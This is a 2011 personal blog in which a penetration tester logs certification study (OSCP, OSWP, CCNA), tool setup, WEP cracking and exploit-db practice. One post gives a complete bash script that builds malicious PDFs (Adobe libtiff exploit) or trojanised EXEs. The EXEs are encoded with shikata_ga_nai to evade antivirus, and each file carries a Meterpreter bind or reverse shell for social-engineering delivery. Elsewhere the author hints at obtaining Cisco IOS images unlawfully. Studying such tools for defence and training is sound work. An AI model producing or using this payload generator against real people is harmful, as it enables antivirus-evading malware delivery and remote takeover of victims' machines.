Wednesday, October 5, 2011

Batter Up! CCNA

I am now working on my CCNA.  This is 4 years in the making.  I should have had this in 2006 but I stopped for work.  Instead, I worked on getting my RHCT.  I do not regret it since it helped a lot with Linux education.  I have a firm grasp of redhat AS and centos because of it.  But it is 2011, I need to get this done.  I am definitely doing self study since I know I am not paying 3000 dollars for a class room and I know my company is not paying for it.  Something that held me up was the $500 or so that is needed for the equipment but I am going to use GNS3.  It is an emulator which can map out an entire environment full of routers and switches.  For further research, go to the site, http://www.gns3.net/.  Warning: you will need to have the cisco IOSs' already in your possession in order for you to use it.  I am sure people can find a way to get that.  I mean it is for your education.

I also bought the book, Cisco Certified Network Associate Study Guide, Sixth Edition, by Todd Lammle.  I also bought a book in 2008, Network Warrior, by Gary Donahue.  I remember liking the book very much but it was unfortuanate that I did not have enough hardware.  I want to read both books with the virtual environment I create.  I know I will still have to buy the hardware but I do not think it is necessary for this exam.  I know I will need it to do the CCNP which I do not mind.  I actually I want to do that. I will even buy a rack for it, I am sure.

This is the next step on my journey to become a great pen-tester and some day, a leader/CEO of a security firm.  The industry is changing.  It is becoming more and more perilous to ignore the dangers of technology.  I would love to be one of the good guys researching solutions to problems and using technology to warn people of the vulnerabilities of their home and organization. 

Anyway, enough dreaming, I am currently going through the commands since I have been through subnetting already.  I will try to keep my blog posts up during this process but no promises.  I want to get this done before December since the OSCE is calling me.  I still fuzz random software.  I want to some day work on 0-days too.  Have to start somewhere. I hope to follow this blueprint but maybe not to the letter: http://infiltrated.net/pentesting101.html.





OSWP Final

Well, I have finally taken the exam for the Offensive Security Wireless Professional.  It was definitely an eye opener.  I understand why so many people say it is outdated, but if you look at the SSID's of your neighborhood, you will see quite a few WEP authenticated/encrypted networks.  Anyway, before I took the exam, I practiced a lot from the labs till I got to the point I could identify what was needed without looking at anything.  In addition, my co-worker even gave me a network to try to crack: an ad-hoc network.  I could not seem to inject into the network but I could sniff the network long enough to crack it.  I could not even de-authenticate the clients of the ad hoc network.  However, it was fun to try every option to crack it. 

I cannot talk much about the exam but I can tell you that if you can do everything in the course, you can pass the exam in the 4 hours that they give you.  I stumbled on one section but eventually got it.  After you pass the exam, they give you the option to get access to their OSWP forum which is pretty cool.  It is the same access that you get when you pass the OSCP.  Overall, I love the course.  I do wish they had more on WPA2 (psk/enterprise) networks, rainbow tables, cowpatty, GPS options, bluetooth and access points attacks.  I did read that they are working on an update to the course.  I will give that a look in the future especially if it offers cracks for bluetooth.  For now, I would suggest this course to anyone who wants the fundamentals of wireless cracking.  You can always expand your knowledge with further research.  They even give you the links for it. 

Monday, September 26, 2011

OSWP Part 2

I have almost completed the OSWP course.  I have been watching videos, taking notes and practicing the exploits.  I did hit a snag, however, with my Linksys access point.  Apparently, there is an issue with the shared key authentication of WEP encryption.  You cannot create an XOR file when you are running airodump-ng and executing a de-authentication of a currently associated client using aireplay-ng.  You get a message of "Broken SKA".  It is very frustrating since I assumed it was my version of Backtrack or possibly my drivers for my ALFA (AWUS036H).  However, I found numerous links about the problem:

http://www.chris-mohan.com/2010/03/wifu-aireplay-ng-ska-attack-problem-with-linksys-wap54g/
http://trac.aircrack-ng.org/ticket/372
http://trac.aircrack-ng.org/ticket/703
http://www.backtrack-linux.org/forums/backtrack-5-experts-section/44327-wifi-ap-wrt45gl-linksys-cisco-broken-ska.html

http://forum.aircrack-ng.org
/index.php?PHPSESSID=dd18de1ba952d186cf749d7760f2643e&topic=233;prev_next=next


Of course, cracking WEP by bypassing SKA was one the last steps of the course.  However, I have another access point that I could use: Dlink-655.  I setup the new access point with the same ESSID and the same VICTIM, I mean client.  This time I was successful.  As soon as I de-authenticated the client, the XOR file was created.  I could then use the file to execute a fake authentication with the Wireless network.  The file was created instantly too.  There must be some bug with either airodump-ng or Linksys.  Possibly, it could be a combination that could be producing this weird behavior.  






Anyway, the only thing left in the lab is cracking WPA networks with the dictionary/custom wordlists.  That should be fine.  I also want to use a collaboration of cewl, crunch and the wordlists from Backtrack 5 R1 to use in the field.  I wonder what kind of results I would get during a security assessment.   


Before I forget, if people are having trouble using profile variables to make the commands shorter, I used the ".bashrc" file.  The /etc/profile was not working for me like the videos illustrated.  I just figured it was my fault since I am using Backtrack 5 R1. Fortunately,  I was able to use the variable $ESSID by adding to the file ".bashrc" for example: 
export ESSID=oswpexam

Friday, August 26, 2011

Bash Scripts

I have been practicing more metasploit and bash scripting.  I came up with a quick script for client side exploits.  It is not mind blowing or anything, but it is nice for a quick file with SE. It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure to add to it later but this is just a starting point.  Have to start somewhere....



#! /bin/sh

#This will create a "special" payload for you. Helps when you want to create Meterpreter files fast.... 

echo "Do you need a pdf or exe 'special' payload?"
read special
if [ $special == "pdf" ]; then
    echo "What is the pdf payload, bind_tcp or reverse_tcp?"
    read Payload
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $special == "exe" ]; then
echo "Do you want the file to execute the payload in a separate process? Yes or No?"
read answer
if [ $answer == "Yes" ] || [ $answer == "yes" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -k -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -k -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $answer == "No" ] || [ $answer == "no" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
       
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi
else
    echo "Did not recognize you response. Please run script again. "
fi

else
    echo "Did not recognize you response. Please run script again. "
fi

Monday, August 22, 2011

Backtrack 5 R1

Finished installing Backtrack 5 R1 on the laptop on the SSD drive.  Just to note, I tried.  I tried to use KDE once more and I just cannot do it.  Basket note pads is enough to make anyone who has used it switch but it just wasn't enough.  The GUI just seems cleaner and less of a headache to use.  I am the first person to try to do something the hard way.  Trust me, ask anyone, but it just did not make any sense to me.  It should be more intuitive to use KDE and it just isn't.  I am not in the GUI all the time but when I am, it should be an easy experience.  Why else even use the GUI in the first place.

Anyway, enough of that.  It was great that they did an update to Backtrack 5 since the DNS plugin bug was a bit of a problem.  I found out later that it was only for the x64 bit versions.  That is what I get for rushing to x64 bit.  Also, it is the reason that I simply did not do the "apt-get update && apt-get upgrade && apt-get dist-upgrade".  I installed R1 pretty quickly since they have made the grub installation seamless.  It always finds my Windows installation and configures the dual-boot perfectly.  Definitely a big plus.  On to the Nvidia drivers which was easy enough once you can get the nouveau drivers from loading.  I use the site: "https://wiki.ubuntu.com/X/Troubleshooting/Nouveau".  I was able to CTRL+ALT+BACKSPACE and run the executable.  Sidenote, I love how easy that it to configure in Gnome: System -> Preferences -> Keyboard -> Layouts -> Options -> Key Sequence to kill the X server.  Wonderful. Shot-out to Muts.  I like to add compiz, what can I say.  I cannot help it.  It adds a even bigger cool factor.

Next, I added the usual addons for Firefox after I upgraded it.  Added Chrome and tsclient.  I updated wireshark to 1.7.0 and updated metasploit 4.0 (the usual command svn up).  However, wireshark was a little more complicated.  I found the page "samiux.blogspot.com/2011_07_01_archive.html".  It was very helpful in the install.  Next, I installed VMware Workstation 7 on R1.  Of course, it did not work with the updated kernel on R1.  Luckily, I found the site: "weltall.heliohost.org/wordpress/2011/05/14/running-vmware-workstation-player-on-linux-2-6-39-updated/".  I was able to get VMware running in 2 seconds.  Sweet.  I know I will need that during the OSCE course.  Next, test it with the Alfa wireless adapter.  No problem there.  Next, remove the splash screen during boot-up.   Sometimes, you do not want everyone seeing a big red screen saying Backtrack 5.  Open up VIM and editing grub.cfg took care of that.

It has been a great install on the laptop.  I am sure I will add more to this post later but I just had to say how good Backtrack 5 R1 has been.  Every Linux install has its hiccups but the finished product is what counts.  This is a pretty good end product when you think of what it is suppose to be used for.  It is not OS X or Windows so you will not hear me complain.  Just saying.

Thursday, August 11, 2011

Offensive Security Wireless Professional: OSWP (Post 1)

I am not posting as much as I want on this blog, but I am still giving it a shot.  I just want to recap the past few weeks, I have been preparing for the OSCE course by using exploits in Exploit-DB and re-writing them, from fuzzing to new python scripts to a shell prompt.  It has been fun time.  I was able to install VMware Workstation 7 on BackTrack 5 x64 Gnome.  I have two virtual machines to work on buffer overflows, windows xp sp2 and sp3.  I also have my desktop that has more virtual machines.  That will be essential for the OSCE course I am sure. 

I have also been increasing my reading.  I have been reading "Ghost in the Wires", "Fuzzing", "Shellcoder's Handbook", "Metasploit: Penetration Tester's Guide" and "KingPin".  All of these books are great reads.  I have not finished "Ghost in the Wires" yet but it definitely has my attention.  Kevin Mitnick, Dave Kennedy, HD Moore and Joe McCray are probably my favorite pentesters/hackers. 

In addition, I have started another Offensive Security course: OSWP!!  I ordered the wireless adapter, ALFA AWUS036H.  I have heard good things about the adapter from the EthicalHacker.Net forum.  On the BackTrack 5 forum, there are instructions on loading the Realtek drivers for packet injection.  I am so excited.  Also, I have a Linksys WRT54G wireless access point.  I have registered for the class but I will be paying for it tomorrow.  Hopefully, I can get the PDF's and videos over the weekend.  I will be posting reviews of the modules and the exam as I go.  Nothing too detailed of course ;-).  When I took the OSCP course, I had a great time learning and I do not expect any less from this course. At least, this time, the exam is only 4 hours. :-).  I have been reading www.aircrack-ng.org for awhile now, but never really tried out cracking WEP or WPA.  I foresee a lot of that from now on.  People still use WEP and weak preshared keys for WPA/WPA2.  This will increase my ability to choose a different attack vector during a penetration test.



BackTrack WiFu Online

Thursday, July 7, 2011

More Buffer Overflows

It has been over a month since my last post.  It has been a really busy time.  When they say the most important resource is time, they are not kidding.  Anyway, in that time I have continuing to go to exploitdb to practice.  I was able to get some basic stack overflows going on two software ftp programs, easyftp and war-ftpd.  I have been using a test OS of Windows XP SP3.  Most of the exploits seem to center around Win XP SP2.  It would be better to try different service packs I guess.  Next, I want to find more SEH exploits.  This was fun trying to figure how to jump around in the stack.  Again, go to http://www.corelan.be/ for information about buffer overflows and infosec in general.  Great stuff.  With easyftp, I was only able to fit the "net user add" payload.  Mannnn, it was a small buffer space.  However, in war-ftpd, the buffer was much larger and I was able to fit a Windows reverse shell.  I have to say, reverse shell is the best.  Just a side note, I have noticed that I have had a lot of success when the payload is encoded in "ShikataGaNai".  It might help someone else so I figured I would mention it. 

Just in case, you thought I let it go, nope.  Paper is still on.  Of course, the new hacker groups that have come out have made this an excellent paper to write.  ;-) I mean I thought of this before two groups even came out in the media.  Not that they were not there the whole time.  I just more time to get the thoughts together and more anecdotal evidence to make it more credible.  With everything that is going on, I should probably just post it by the end of the year so I can get all the probable hacks that will come recorded. 

Monday, May 30, 2011

Buffer Overflows

It has been a while since I posted anything.   It has been a busy time.  I have been able to sneak in some time to work on my OffSec skills.  Hey I am working on it.  Anyway, to prepare for the OSCE course, I am looking through the 'www.exploit-db.com' site and trying to re-exploit applications that are available using python.  I like python a lot and trying to get better at it currently so it looked like the obvious choice.  I am running into some confusion on the Savant 3.1 Web Server.  I understand that when exploiting SEH, we are looking for a POP, POP, return.  I understand that when you have a stack exploit, you look for a JMP into a CPU register.  But somehow, I am getting lost on the POP, RET.  Is it just the same logic behind SEH?  Are we just popping the last entry in the stack and putting the last memory entry in EIP? I have reviewed the exploit code from "http://www.exploit-db.com/exploits/10434/".  Also, there is a great tutorial for EggHunters and Buffer Overflows at "http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html".  Just a side note, this blog has helped me in the past understand SEH exploits along with the site "https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/".   That site is incredible too.  If you want to know about buffer overflows, these are the sites to go to.  Anyway, I am kind of stuck right now, but the irony is that the person who found the vulnerability to Savant is Muts, teacher and founder of OffSec of OSCP and OSCE courses.  I know I have a lot of learning in store for me with the OSCE.  Hopefully, I can get some more headway with this.  On a more depressing note, I am sure I cannot afford any big CONs this year like I planned if I want to get the OSCE course and move by next year.  But the good news, I am sure there will be great CONs then too.

Wednesday, May 18, 2011

Education: 2011

I have been gathering, watching and reading more and more info-sec data from everywhere including great books, from Amazon of course and it has been helping a lot.  I just wanted to mention some of the things I have been using to learn, just in case you are starting out like me.  Most of the information has been leaning towards social engineering and browser exploits.  For example, if you start looking at enough YouTube clips of DefCons and presentations by the elite security researchers and pentesters, you learn that nowadays, most attacks are done on layer 7 and 8 of the OSI model. The recent Playstation PSN hack was reported to have started from a Spear Phishing attack.  It seems that a little social engineering goes a long way.  All it takes is one click.  Depending on the vulnerability, it might even be easier.  With SQLi and XSS, you can move the browser for your victim to introduce an exploit.  A user is directed to the wrong page or opens the wrong email.  It can happen and it obviously does.  Ask Sony.  Here is my list:

Books:
Dissecting the Hack: The Forb1dd3n Network (Half way done)
Python Network Programming (Just beginning)
Social Engineering: The Art of Human Hacking (Just bought)
KingPin (Just bought)
Fuzzing: Brute Force Vulnerability Discovery (Just bought)
The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws
(Just beginning)

Videos:
Elearning Security
Malware Analysis - http://youtu.be/fqf5LfPwmm4
Malware Analysis - http://youtu.be/jake9ibMIpc

Joe McCray
PenTesting - http://www.youtube.com/watch?v=tJsNu0VRKYY
Advanced SQL Injection - http://www.youtube.com/watch?v=rdyQoUNeXSg
Advanced SQL Injection (LayerOne 2009) http://www.youtube.com/watch?v=WkHkryIoLD0

Sam Kamkar
Hacking Facebook/PHP - http://www.youtube.com/watch?v=fEmO7wQKCMw&feature=related

IronGeek (Adrian Crenshaw)
Numberous Videos -*.*- http://www.irongeek.com/i.php?page=security/hackingillustrated
Dakykilla, Purehate and Irongeek
Password Exploitation Class - http://www.irongeek.com/i.php?page=videos/password-exploitation-class

SecurityTube
Numberous Videos -*.*- http://www.securitytube.net/

Python Programming
Computer Science Class - http://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/index.php



Member of EthicalHacker.net
PenTesting Steps  - http://www.infiltrated.net/pentesting101.html


EthicalHacker
Great Forum w/ videos,links,articles for Pentesting - http://ethicalhacker.net

Hopefully, this helps other people in the quest for knowledge.  Good Night

Monday, May 16, 2011

Education: 2011

I just wanted to make a quick post about my studies for this year.  I plan on taking a few courses and certification exams this year, like any other year really. I have been slowly preparing to be a better security and IT professional for my company and for myself.  There is a lot of great information out there to learn if anyone is willing to put in the time and energy.  Anyway, so far, I have taken two exams already.  The first, OSCP, was very exciting, informative, fun and difficult.  I will include a review about it in a later post which it definitely deserves.  The next exam was the CASP exam which is targeted to be the next "level" from the Security+ exam.  It was a free beta exam so I figured why not.  It was a little difficult since it hit on topics I have not researched before.  It still just seems like a waste of time compare to an exam like the OSCP which is more hands-on.

The remaining two exams for this year are the OSCE and CCNA.  The OSCE is the next course of the OffSec group after the OSCP.  I must say, I am dying to take this course.  I know it can take me to that next stage of offensive security such as evading anti-virus, attacking web applications, buffer overflows with staged exploits and writing in assembly language.  It will be a painfully exciting time I am sure.  Finally, I will take the CCNA exam.  I have put this off for years now.  I just want to get it out of the way to be honest.  I am just having a hard time getting my hands on either the Cisco IOSs' or the Cisco hardware.  The hardware would cost more than the exam.  I tried to go the cheaper route by using the cisco emulator GNS3.  Of course, you need to be able to get a copy of the IOS.  FAIL.  I do not have access to the IOSs' yet.  Legally anyway.  I will end up just buying the hardware.  If you see late night flashes of light and power surges going in your neighborhood, it is probably because I live near you.  I have seen some good deals on ebay and ciscokits.com.  Oh, before I forget, I am also practicing programming in python. It seems to be great when you want to do network programming.  I am just using homework assignments from computer science courses on the Internet to practice.  It seems to be working.  I will post as I go along.  Good Night...


OSCP: Offensive Security Certified Professional
OSCE: Offensive Security Certified Expert
CCNA: Cisco Certified Network Associate
CASP: CompTIA Advanced Security Practitioner
OSWP: Offensive Security Wireless Professional
GPEN: GIAC Certified Penetration Tester

Saturday, May 14, 2011

Agoonie's first post

This is my first post.  Of course, in my first post, I have to describe my first project.  I was having a discussion about security and a friend of mine asserted something interesting.  The first assertion was that "hacking" or cyber crime, statistically, rarely happens and secondly, that when it does, it does not have a major effect on people, particularly the victims.  I have to argue those opinions.  I figured that it would be a good idea to write a paper about it and post it on my blog.  Why not?  So I shall be writing the paper on my computer and put it on one of my blog posts in the future.  Oh, yeah, hello everyone.